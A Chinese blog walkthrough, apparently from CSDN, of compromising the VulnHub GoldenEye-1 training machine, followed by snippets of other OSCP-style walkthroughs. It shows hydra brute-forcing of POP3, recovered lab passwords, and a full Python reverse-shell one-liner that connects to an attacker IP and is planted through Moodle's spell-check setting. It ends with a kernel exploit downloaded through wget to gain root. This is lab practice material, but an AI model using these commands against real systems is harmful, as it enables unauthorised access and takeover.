代码编织梦想

靶机地址

https://www.vulnhub.com/entry/goldeneye-1,240/
 

深入交流学习:webMsec

安装靶机

主机发现

sudo arp-scan -l

192.168.52.136

信息收集

nmap -sS -sV -T5 -A -p- 192.168.52.136

运行了邮件服务,先看看80端口

访问/sev

-home/需要账户密码

查看源码发现js文件terminal.js

在注释当中发现两个用户:boris和Natalya

注释中还给出了HTML编码之后的password,base64解码后为:InvincibleHack3r

使用获得的用户名和密码,尝试登录http://192.168.52.136/sev-home/

访问55006和55007,确定是55007

接下来,用hydra爆破pop3

hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.52.136 -s 55007 pop3

boris和natalya的pop3密码都爆破出来

接下来,nc登录pop3,看看有什么邮件

用户名:xenia,密码:RCP90rulez!

域:http://severnaya-station.com

网址:http://severnaya-station.com/gnocertdir

根据邮箱的要求,修改hosts文件,添加域名,然后访问

使用刚才的账号密码登录,moodle的开源cms

发现一封邮件,找到用户名doak

继续hydra爆破得到密码goat

并登录pop3

用户名:dr_doak,密码:4England!

重新登录CMS,发现一个s3cret.txt文件。

下载下来,使用exiftool查看

base64解密一下得到xWinter1995x!

admin/ xWinter1995x!登录moodleCMS

Plugins-Text editors-TinyMCE,Spell engine选项修改为PSpellShell

然后添加python-reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.connect(("attackip",port));os.dup2( s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

触发shell,nc开启监听

提升交互式shell,并查看内核版本

uname -a

因为靶机没有gcc,改一下,改成cc

然后建立一个简单的httpserver,把exp传过去

然后在靶机用wget下载

编译cc,并执行

执行成功,id,root到手

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51045322/article/details/127129086

和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)-爱代码爱编程

每台都尽量做一做,然后记录在博客里.供自己和大家一起学习. 网站来源。在google上,要那个才能打开。方便大家复制,我又把vulnhub的地址复制粘贴到文末了 hackthebox要去官网上。搜这些机子 我觉得htb的质量比vuln高多了,后者太多ctf猜谜语一样 Kioptrix: Level 1 (#1): https://www.vul

Vulnhub-OSCP靶机实战-爱代码爱编程

前言 这个靶机适合新手,因为步骤很短很短 靶机下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/ KALI地址:192.168.241.108 靶机地址:192.168.241.170 一.信息收集 1.主机发现 使用命令如下 netdiscover -r 192.

oscp-vulnhub:gitroot靶机实战_cjstang的博客-爱代码爱编程

一、前言 主要利用方式:hydra 密码破解+git show 反弹shell获取平行账号权限+git 命令提权 二、靶机信息     靶场: vulnhub.com     靶机名称: GitRoot: 1     难度: 高难度     发布时间: 2020 年 6 月 3 日  

oscp-vulnhub:ha-wordy靶机实战_cjstang的博客-爱代码爱编程

----------------------------------------------------------------------------------------------------------- 前置:本文题干阅读时间推荐10min,靶场练习推荐4h ------------------------------

vulnhub-tiki - 类oscp靶机攻略1_雨天呀的博客-爱代码爱编程

vulnhub-Tiki Date: 07/14/2022 Difficulty: Easy Tags: CVE-2021-26119, CVE-2021-4034, Tiki CMS, sudo -l https://www.vulnhub.com/entry/tiki_1,525/ 信息搜集 端口扫描 目录扫描 ➜ ~ dirsearch

oscp - vulnhub billy madison: 1.1 靶机测试_m0_55751267的博客-爱代码爱编程

仅以此文来记录我的oscp靶场训练过程  Billy Madison: 1.1 ~ VulnHub 拿到了靶机之后改为桥接导入VMware kali和靶机全部上线后,nmap扫描 192.168.165.0/24  发现靶机ip为192.168.165.156  hping3 nmap  先跑一下ssh的弱口令 虽然没啥用

oscp-vulnhub靶机记录-digitalworldlocal-fall_mr. m2021的博客-爱代码爱编程

vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。 深入交流学习:webMsec 靶机下载地址; https://www.vulnhub.com/entry/digitalworldlocal-fall,726/ 一、安装靶机 这里可以得到靶机ip 192.168.179.132 二、信息收集 很多人用nmap,我一

oscp-vulnhub靶机记录-hack me please walkthrough_mr. m2021的博客-爱代码爱编程

机器地址: https://www.vulnhub.com/entry/hack-me-please-1,731/ 深入交流学习:webMsec 安装好靶机: 主机发现: arp-scan -l 信息收集一波: ./nmapAutomator.sh -H 192.168.52.133 -t All PORT

oscp-vulnhub靶机记录-bravery-walkthrough_mr. m2021的博客-爱代码爱编程

靶机地址 https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ 深入交流学习:webMsec 安装靶机 打开kali,扫存活主机 nmap -sP 192.168.160.0/24 靶机ip 192.168.160.128 扫一波端口和服务: ./nmapAuto

oscp-vulnhub靶机记录-development-walkthrough_mr. m2021的博客-爱代码爱编程

靶机地址 https://www.vulnhub.com/entry/digitalworldlocal-development,280/ 深入交流学习:webMsec 主机发现 Nmap -sS 192.168.52.0/24 得到靶机ip 192.168.52.137 信息收集 nmap -sS -sV -A -p- -T5 192.

oscp-vulnhub靶机记录-election-walkthrough_mr. m2021的博客-爱代码爱编程

靶机地址:https://www.vulnhub.com/entry/election-1,503/ 深入交流学习:webMsec 安装靶机 主机发现 靶机ip 192.168.160.130 信息收集 nmap -sS -sV -A -p- ip -oN election.nmap PORT STATE SERVICE 22/tc